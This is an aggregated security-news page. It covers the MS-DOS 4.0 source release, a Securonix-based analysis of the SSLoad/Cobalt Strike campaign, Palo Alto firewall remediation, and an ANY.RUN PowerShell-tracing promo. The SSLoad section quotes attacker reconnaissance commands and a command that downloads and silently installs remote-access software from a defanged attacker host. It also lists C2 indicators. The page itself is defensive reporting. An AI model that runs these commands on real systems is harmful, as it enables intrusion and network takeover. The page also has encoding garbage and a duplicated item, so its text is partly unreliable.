CYBERSECURITY / DEFENSE / INTELLIGENCE

  • In a historic move, Microsoft has made the source code for MS-DOS 4.0, one of the most influential operating systems of all time, publicly available on GitHub.

    This decision marks a significant milestone in the company’s commitment to open-source software and preserving computing history.

    “Today, we are thrilled to release the source code for MS-DOS 4.0 under the MIT license, fostering a spirit of open innovation,” said a Microsoft spokesperson. “This operating system’s 8086 assembly code, written over 45 years ago, is a remarkable testament to the ingenuity and dedication of our predecessors.”

    The Legacy of MS-DOS

    MS-DOS, short for Microsoft Disk Operating System, was the dominant operating system for personal computers throughout the 1980s and early 1990s.

    Developed by Microsoft and first released in 1981, MS-DOS provided a command-line interface that allowed users to interact with their computers and run applications.

    Despite its simplicity, MS-DOS played a crucial role in the personal computer revolution, enabling the widespread adoption of home and office computing.

    It served as the foundation for many popular software applications and games, shaping the early days of the software industry.

    Document

    Integrate ANY.RUN in Your Company for Effective Malware Analysis

    Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

    • Real-time Detection
    • Interactive Malware Analysis
    • Easy to Learn by New Security Team members
    • Get detailed reports with maximum data
    • Set Up Virtual Machine in Linux & all Windows OS Versions
    • Interact with Malware Safely

    If you want to test all these features now with completely free access to the sandbox:

    The Significance of the MS-DOS 4.0 Source Code Release

    The release of the MS-DOS 4.0 source code is significant for several reasons:

    1. Historical Preservation: By making the source code publicly available, Microsoft is ensuring that an important piece of computing history is preserved for future generations to study and learn from.
    2. Educational Value: Aspiring programmers and computer science students can now study the inner workings of a classic operating system, gaining valuable insights into low-level programming, memory management, and system architecture.
    3. Community Engagement: The open-source community can now contribute to the MS-DOS 4.0 codebase, potentially improving it, adding new features, or porting it to new platforms.

    By releasing the MS-DOS 4.0 source code, Microsoft is embracing open-source principles and ensuring that this important piece of computing history is preserved for future generations.

    The source code, now available on GitHub, provides a valuable resource for researchers, historians, and enthusiasts alike, allowing them to study and understand the inner workings of this iconic operating system.

    Microsoft’s decision to open source MS-DOS 4.0 aligns with the company’s broader efforts to promote transparency and collaboration within the tech community. By making the source code publicly accessible, Microsoft encourages developers, researchers, and hobbyists to explore, learn from, and potentially build upon this historic codebase.

    The release of the MS-DOS 4.0 source code on GitHub, a popular platform for open-source software development, presents exciting opportunities for collaboration and community engagement.

    Developers and enthusiasts worldwide can now contribute to the project, propose improvements, fix bugs, or even create new applications based on the original codebase.

    This move by Microsoft celebrates the company’s rich technological heritage and demonstrates its commitment to fostering open-source communities and encouraging innovation through shared knowledge and collaboration.

    The release of the MS-DOS 4.0 source code is a significant milestone in preserving computing history and a testament to Microsoft’s embrace of open-source principles.

    By making this iconic operating system’s source code publicly available, Microsoft is ensuring that MS-DOS’s legacy lives on, inspiring future generations of developers and researchers while promoting transparency and collaboration within the tech community.

    Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach -Β Download Free Guide

    The post Microsoft Publicly Releases MS-DOS 4.0 Source Code appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • A new attack campaign has been discovered to be employed by the FROZEN#SHADOW, which utilized SSLoad malware for its operations and Cobalt Strike Implants to pivot and take over the entire network.

    In addition, the threat actors also used Remote Monitoring and management) software like ScreenConnect RMM for further control.

    SSLoad is a well-designed malware that can stealthily infiltrate the systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.

    Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.

    Technical Analysis

    This new attack campaign starts with a traditional phishing email containing a malicious link.

    When users visit this link, it redirects them to mmtixmm[.]org URL to another download site where a JavaScript file is downloaded to the victim machine.

    Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach -Β Download Free Guide

    If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.

    The targeting of these phishing email campaigns appears to be random, as the victims were in multiple countries, including Asia, Europe, and the Americas.Β 

    Further investigations on the malware revealed that the attack takes place in different stages as follows:

    • Stage 1: Initial Execution – JavaScript
    • Stage 2: MSI File Execution
    • Stage 3: Malware Execution
    • Stage 4: Cobalt Strike Execution
    • Stage 5: RMM Software & Lateral Movement

    Stage 1: Initial Execution – JavaScript

    This initial stage involves the manual execution of the JavaScript file.

    On analyzing the JS file out_czlrh.js, it was discovered that it consisted of 97.6% commented code with random characters to obfuscate the file.

    However, removing the commented code revealed a crystal clear JS code that did not have any kind of obfuscation. 

    JS file code with multiple commented code (Source: Securonix)

    On analyzing the JS code, it was observed that the JS file performs multiple operations which starts with creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.

    After this, the JS code, which contains “GetObject(β€œwinmgmts:\\\\.\\root\\cimv2”),” tries to access WMI Object for simple command line operations.

    Clean code after removing Comments from the JS code (Source: Securonix)

    In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.

    Further, the script also maps all the available drives to a network share located at \\wireoneinternet[.]info@80\share\.

    The JS code also executes the “net use” command via WMI to map the network drive correctly.

    After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.

    Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.

    Stage 2: MSI Execution

    This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.

    The malware was capable of filtrating networks and deploying additional payloads. However, after executing this slack.msi file, the malware communicates with multiple domains

    • wireoneinternet[.]info
    • skinnyjeanso[.]com
    • titnovacrion[.]top
    • Maramaravilha[.]com
    • globalsolutionunlimitedltd[.]com

    Moreover, only after this is the SSLoad malware downloaded and executed.

    The payloads of the SSLoad consist of a semi-randomly named DLL file, which is located in \%APPDATA%\local\digistamp\mbae-api-na.dll.

    This DLL is, however, executed by Rundll32.exe, after which the DLL copies itself to %APPDATA%\Custom_update\.Β 

    SSLoad DLL file details (Source: Securonix)

    Stage 3: Malware Execution

    In addition to the previous stage, the execution of the rundll32.exe command will also begin communication with two preconfigured C2 servers which are hxxps://skinnyjeanso[.]com/live/ and to hxxps://titnovacrion[.]top/live/. Following this, the malware begins to collect the system and user data for local host as well as the domain related information using following cmd.exe commands.

    • exe /c ipconfig /all
    • exe /c systeminfo
    • exe /c nltest /domain_trusts
    • exe /c nltest /domain_trusts /all_trusts
    • exe /c net view /all /domain
    • exe /c net view /all
    • exe /c net group β€œdomain admins” /domain
    • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
    • exe /c net config workstation
    • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
    • exe /c whoami /groups

    These collected information are then sent to the C2 servers via HTTPS connections. Once the threat actors receive this information from the infected system, they begin to execute some manual commands after confirming that the information is from a legitimate server and not from a honeypot. The manual commands executed by the threat actors are as follows:

    • exe -c β€œ[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(β€˜utf-8’); cd c:\; powershell”
    • exe /groups
    • exe group β€œdomain admins” /dom
    • exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

    These commands were executed to manipulate and prob the server environment for the next stage of malware activities.

    Stage 4: Cobalt Strike Beacon

    This stage of the malware involves deploying the Cobalt Strike beacon on the systems after executing the manual commands.

    Once this beacon is deployed, it becomes the primary means of communication for the C2. However, this beacon is dropped and executed via the following rundll32.exe command.

    Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

    Additionally, the threat actors also used this Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using the following commands:

    • exe /c whoami /groups
    • exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
    • exe /c iwr -uri β€œhxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:\programdata\msedgeview.msi
    • exe /c systeminfo
    • exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

    Stage 5: RMM Software And Lateral Movement

    Every single compromised system is controlled with the ScreenConnect RMM Software so as to maintain complete control on the system.

    However, After this, the Lateral movement takes place by harvesting the credentials and other critical system details.

    The enumeration of the environment is done using multiple PowerShell commands such as Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer PowerShell commandlets.

    The credential extraction is performed through which they can also obtain a domain admin account NTLM hash.Β 

    Indicators Of Compromise

    C2 Address

    • 85.239.54[.]190
    • 23.159.160[.]88
    • 23.95.209[.]148
    • 45.95.11[.]134
    • bjSdg0.pintaexoticfashion.co[.]in
    • l1-03.winupdate.us[.]to
    • 23-95-209-148-host.colocrossing[.]com:443
    • mmtixmm[.]org
    • wireoneinternet[.]info
    • skinnyjeanso[.]com
    • titnovacrion[.]top
    • simplyfitphilly[.]com
    • kasnackamarch[.]info
    • sokingscrosshotel[.]com
    • danteshpk[.]com
    • stratimasesstr[.]com
    • winarkamaps[.]com
    • globalsolutionunlimitedltd[.]com
    • maramaravilha[.]com
    • krd6[.]com
    • hxxps://t0talwar.screenconnect[.]com

    Furthermore, a complete list of files/hashes used for this attack campaign can be found here.

    Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security AwarenessΒ Training -> Try Free DemoΒ 

    The post New SSLoad Malware Combined With Tools Hijacking Entire Network Domain appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Palo Alto Networks has issued urgent remediation advice after discovering a critical vulnerability, designated CVE-2024-3400, which threat actors have exploited to gain unauthorized access to several firewall products.

    The cybersecurity giant has outlined detailed steps for organizations to mitigate the risks associated with this breach and secure their networks against further attacks.

    Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

    Understanding CVE-2024-3400

    CVE-2024-3400 is a severe security flaw affecting specific versions of Palo Alto Networks’ firewall operating system, PAN-OS.

    The vulnerability allows threat actors to execute commands interactively, potentially leading to unauthorized data access, system manipulation, and the introduction of malicious code.

    This vulnerability’s exploitability has made it a prime target for cybercriminals, emphasizing the need for immediate and decisive action from affected organizations.

    Investigations have revealed that the exploitation of CVE-2024-3400 involves sophisticated threat actors who have managed to install backdoors and execute arbitrary commands on compromised devices.

    This level of access could enable attackers to exfiltrate sensitive data, disrupt network operations, and maintain persistent access to the victim’s environment, posing significant security and business continuity risks.

    Document

    Integrate ANY.RUN in Your Company for Effective Malware Analysis

    Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

    • Real-time Detection
    • Interactive Malware Analysis
    • Easy to Learn by New Security Team members
    • Get detailed reports with maximum data
    • Set Up Virtual Machine in Linux & all Windows OS Versions
    • Interact with Malware Safely

    If you want to test all these features now with completely free access to the sandbox:

    Suggested Remediation

    Palo Alto Networks has recommended a two-pronged approach to remediate the impact of CVE-2024-3400:

    1. Update to the Latest PAN-OS Hotfix: Organizations are urged to immediately update their firewall systems to the latest hotfix provided by Palo Alto Networks.
    2. This update addresses the vulnerabilities the attackers exploit and closes the security gaps that allow initial access.
    3. Perform a Factory Reset: Due to the invasive nature of the attacks and the potential for residual malicious modifications, a factory reset of the affected firewalls is strongly advised.
    4. This reset will eradicate any configurations, including those potentially manipulated by threat actors, and restore the devices to their original state.

    How to Perform Private Data Reset and Factory Reset

    To ensure the thorough removal of any threat actor presence and to safeguard against future vulnerabilities, organizations should follow these steps:

    • Backup Configuration: Before proceeding with the reset, ensure all current configurations are backed up, as they will be erased during the factory reset process.
    • Initiate Factory Reset: Access the firewall’s management interface and select the factory reset option.
    • This process will return the firewall to its original factory settings, removing all user data, configurations, and, critically, any unauthorized changes made by attackers.
    • Restore and Review: After the reset, carefully restore the necessary configurations from backups. Reviewing these configurations to ensure no malicious alterations are reintroduced into the system is crucial.

    This incident underscores the importance of comprehensive security practices, including regular updates, monitoring for unusual activity, and swift response to security advisories.

    Palo Alto Networks has also emphasized the value of conducting regular security audits and employing advanced threat detection tools to identify and mitigate potential vulnerabilities before they can be exploited.

    Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo 

    The post Palo Alto Networks Shares Remediation Advice for Hacked Firewalls appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Threat actors are attempting to actively exploit a critical security flaw in the WP‑Automatic plugin for WordPress that could allow site takeovers. The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.9.2.0. “This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Threat actors are attempting to actively exploit a critical security flaw in the WP‑Automatic plugin for WordPress that could allow site takeovers. The shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.9.2.0. “This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Months of work to build up stocks means the U.S. can give Ukraine more of the sought-after long-range weapon.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Ukraine, robotics, and more are driving a six-year plan to improve training in irregular warfare, technology, and psyops.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Its CEO also said the company won’t compete to build cheap, non-survivable drones.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Hackers exploit PowerShell, a built-in scripting tool on Windows (and sometimes Linux), to launch various attacks. PowerShell scripts can download malware, bypass antivirus, steal data, and grant remote access.Β Β 

    The scripts are attractive to attackers because they are easy to write, difficult to detect due to obfuscation techniques (like partial name matching), and leverage legitimate system resources for malicious actions (β€œliving off the land”) but some tools can analyze these PowerShell scripts for safe detonation and step-by-step tracing.Β 

    PowerShell scripts are a type of automation tool used on Windows systems that can be used for legitimate purposes like configuration management or for malicious purposes like installing malware.Β Β 

    Easily see detailed function input and output in PowerShell Tracer

    The new PowerShell Script Tracer helps analysts understand what a PowerShell script does by providing a detailed breakdown of the script’s functions and how they connect to each other, which can help analysts identify malicious behaviour in the script more easily.Β 

    Hackers often use it to perform a variety of malicious actions, such as:Β 

    • Download and execute malicious binaries from a separate source.Β 
    • Bypass antivirus software by executing the script in memory.Β 
    • Execute malicious scripts.Β 
    • Collect and exfiltrate system data.Β 
    • Remotely control the infected system.Β 
    Document

    Integrate ANY.RUN in Your Company for Effective Malware Analysis

    Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

    • Real-time Detection
    • Interactive Malware Analysis
    • Easy to Learn by New Security Team members
    • Get detailed reports with maximum data
    • Set Up Virtual Machine in Linux & all Windows OS Versions
    • Interact with Malware Safely

    If you want to test all these features now with completely free access to the sandbox:

    ANY.RUN’s Script Tracer helps analyze PowerShell scripts used in malware and to access it, locate the process tree on the right side of the interface, which shows processes launched, including PowerShell commands.Β 

    PowerShell command launched

    For further investigation where you can see how this tracer works, click on the specific PowerShell process in the tree, which will display a process details tab at the bottom and within this tab, click “More Info” to access the Script Tracer and gain detailed insights into the deobfuscated script’s activities.Β Β 

    The Advanced Details window replaces the general process information with a detailed view of what it is doing.

    The Script Tracer tab focuses on PowerShell executions and shows the functions called by the process in order, from top to bottom.

    This allows you to determine how the process is acting by examining the function calls and how they are executed.

    Advanced details of a process window

    A malicious program downloads data from a URL using the System.Net.WebClient class. The downloaded data are binary and encoded in Base64.

    The program then decodes the data using the FromBase64String method and converts it to a Unicode string using System. Text.UnicodeEncoding.GetString.Β 

    The MZ signature in the trace indicates that the string is the actual PowerShell command that the program wants to execute, which is most likely an encoded executable file. 

    Static Discovering

    The provided PowerShell code exhibits several indicators of malicious intent and executes hidden, bypassing security measures (-windowstyle hidden, -executionpolicy bypass) by downloading data from image URLs ($links) and extracting a Base64-encoded command hidden within the downloaded content ($imageText.Substring). 

    This retrieved command is then loaded directly into memory as a.NET assembly for execution ([System.Reflection.Assembly]::Load), bypassing traditional file-based detection methods suggesting the code aims to download and execute a hidden malicious payload (hidden) within an image. 

    Analysis revealed the script’s malicious nature, where extracted URLs, https://uploaddeimagens[.]com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469 and https://uploaddeimagens[.]com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500, can be used as Indicators of Compromise (IOCs) for further investigation.

    Analyze PowerShell Scripts in Malware inΒ ANY.RUNΒ - Register for Free

    What is ANY RUN?

    ANY.RUN is a renowned ally for over 400,000 cybersecurity experts globally. This interactive sandbox platform streamlines the malware analysis process for threats aimed at both Windows and Linux systems, equipping analysts with a sophisticated tool for their investigative work.

    Additionally, ANY.RUN’s threat intelligence offerings, namely Lookup and Feeds, deliver precise indicators of compromise and contextual insights that enable users to detect threats and manage incident responses swiftly.

    ANY.RUN enhances the speed and accuracy of threat analysis. The platform is adept at identifying common malware families using YARA and Suricata rules and can pinpoint malware behaviors through signatures when specific family detection is unfeasible.

    Key Features of ANY.RUN:

    • Rapid Malware Detection: ANY.RUN can detect malware in approximately 40 seconds following a file upload. It utilizes YARA and Suricata rules to recognize well-known malware families and employs behavioral signatures to identify malicious activities in new threats.
    • Real-Time Interaction with Samples: Powered by VNC, ANY.RUN’s interactive cloud sandbox allows users to perform real-system activities such as browsing web pages, navigating through installers, and accessing password-protected archives.
    • Cost-Effective and Maintenance-Free: As a cloud-based solution, ANY.RUN eliminates the need for initial setup or ongoing maintenance, saving time and resources for businesses.
    • Comprehensive Malware Behavior Analysis: ANY.RUN offers an in-depth examination of malware behavior, tracking network traffic, system calls, and file system modifications.
    • Enhanced Team Collaboration: The platform facilitates easy sharing of analysis results among team members. Senior analysts can also review the work of junior colleagues by accessing recordings of their analysis sessions.
    • Scalability: ANY.RUN’s cloud service model allows for easy scaling of security operations by simply adding more licenses.

    For a closer look at how ANY.RUN can benefit your security team, contact ANY.RUN for a personalized guided tour of the platform.

    Β 

    The post Analyze Malicious Powershell Scripts by Running Malware in ANY.RUN Sandbox appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The North Korea-linked threat actor known as Lazarus Group employed its time-tested fabricated job lures to deliver a new remote access trojan called Kaolin RAT. The malware could, “aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from [command-and-control] server,” Avast security researcher Luigino

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ